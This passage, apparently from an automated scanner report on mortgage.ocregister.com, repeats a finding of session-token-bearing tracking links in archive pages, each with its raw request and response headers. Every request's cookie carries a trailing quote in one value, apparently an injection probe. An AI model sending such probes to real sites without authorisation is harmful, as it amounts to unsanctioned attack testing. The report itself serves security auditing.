Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:07:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:07:07 +0000
Cache-Control: max-age=294, must-revalidate
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html
Content-Length: 99712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.2. http://mortgage.ocregister.com/2007/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.3. http://mortgage.ocregister.com/2007/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.4. http://mortgage.ocregister.com/2007/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.5. http://mortgage.ocregister.com/2007/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.6. http://mortgage.ocregister.com/2007/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.7. http://mortgage.ocregister.com/2007/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.8. http://mortgage.ocregister.com/2007/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.9. http://mortgage.ocregister.com/2007/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.10. http://mortgage.ocregister.com/2007/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.11. http://mortgage.ocregister.com/2007/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.12. http://mortgage.ocregister.com/2007/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.13. http://mortgage.ocregister.com/2008/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.14. http://mortgage.ocregister.com/2008/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.15. http://mortgage.ocregister.com/2008/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.16. http://mortgage.ocregister.com/2008/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.17. http://mortgage.ocregister.com/2008/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.18. http://mortgage.ocregister.com/2008/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.19. http://mortgage.ocregister.com/2008/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

2.20. http://mortgage.ocregister.com/2008/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
